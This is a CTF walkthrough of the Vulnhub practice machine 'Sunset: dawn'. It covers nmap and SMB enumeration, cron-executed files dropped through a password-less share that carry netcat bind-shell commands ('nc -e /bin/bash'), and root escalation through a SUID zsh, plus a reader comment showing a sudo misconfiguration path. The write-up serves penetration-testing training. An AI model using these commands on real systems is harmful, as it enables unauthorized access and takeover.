Sunset: dawn Vulnhub Walkthrough
Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of Penetration Testing practices. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”. Let’s start and learn how to successfully breach it.
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.
Penetration Testing Methodology
- Browsing HTTP Service
- Performing Directory Bruteforce
- Enumerating log files
- Enumerating SMB using Enum4linux
- Connecting via SMB
- Sending files with netcat invocation
- SUID bit on zsh
Capture the flag
We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.
This was found out to be 192.168.1.165.
Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the port 139,445,3306 open. This tells us that we have the NetBIOS and MySQL service running on the target machine respectively.
Since we got the port 80 open, we decided to browser the IP Address in the browser. We were given an unavailable error as shown in the given image.
We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called “logs” as shown in the given image.
Upon finding the logs directory, we opened the URL in our browser. This gave us a bunch of different log files like auth.log, daemon.log, error.log and management.log. We tried to access the all those log files but we got forbidden message in all except management.log.
So, we downloaded the management.log and used cat command to open the management.log on our attacker machine (Kali Linux). Here we see that we have a directory named “ITDEPT”. It contains two files namely product-control and web-control. As these files were mentioned with cron, we can safely say that these files are getting executed by some background task.
cd Downloads cat management.log
Back to the nmap port scan, we found that there is a NetBIOS SMB. Its time to enumerate this machine’s SMB Service. There are multiple ways to do this about which you can learn here. now we decided to use the Enum4Linux script. This shows that we have the ITDEPT directory we found earlier. This means this directory is accessible through SMB.
enum4linux -a 192.168.1.165
Also, as we explored the result of Enum4Linux, we saw that we have two users namely, “dawn” and” ganimedes”.
Since we found the ITDEPT directory in our enumeration. We tried to access it using the SMB as shown in the image. We gave a blank password to login. Upon logging in we ran the ls command. We found nothing in it. We ran the ls command again with the -al parameters to see if we missed any hidden files but we couldn’t find any.
smbclient //192.168.1.165/ITDEPT ls -al
But this doesn’t mean that we cannot create any file in it. We went back to our terminal and created the files by the name of “product-control” and “web-control”. We created the files by this name because earlier while enumerating the management.log file we saw that files with this name were executed after every minute. again and again, using cron. We also entered the netcat shell invocation script in those files using the echo command as well.
echo "nc -e /bin/bash -lvp 1234 &" > product-control echo "nc -e /bin/bash -lvp 1235 &" > web-control ls
Now back to the SMB shell, we transferred the files that we just created to the target system using the put command. Both the files were successfully transferred. After the transfer, we ran the ls command to check whether the files were indeed on the system or not. As seen in the image given below, we have put our files on the target system.
put product-control put web-control ls
Now, we went back to our browser, to see the log directory. From there we downloaded the management.log file again. We did this as if those files we just created were executed or not. As shown in the image, the files were successfully executed.
Now we ran the netcat to get this session on the target machine. We get our shell through netcat. This was an improper shell. So, we used the python one-liner to convert this into a proper shell. On conversion, we saw that the shell we got was of user dawn.
nc 192.168.1.165 1234 python -c 'import pty;pty.spawn("/bin/bash")'
Now that we had a shell, it was a regular practice to check for any file having SUID permissions with the help of Find command. By using the following command, we enumerated all binaries having SUID permissions:
find / -perm -u=s -type f 2>/dev/null whoami /usr/bin/zsh whoami cd /root ls cat flag.txt
The Find command gave us that the zsh command can help us escalate privilege on this machine. We ran the zsh command and checked our status using the whoami command. We got root. Now it was time to enumerate for the flag. We traversed into the root directory and found the flag.txt file. This concludes this CTF.
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here
One thought on “Sunset: dawn Vulnhub Walkthrough”
Nice Article & I found other privilege escalation as well in dawn
Matching Defaults entries for www-data on dawn:
User www-data may run the following commands on dawn:
(root) NOPASSWD: /usr/bin/sudo
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dawn:/home/dawn/ITDEPT$ /usr/bin/sudo sudo su
uid=0(root) gid=0(root) groups=0(root)
Comments are closed.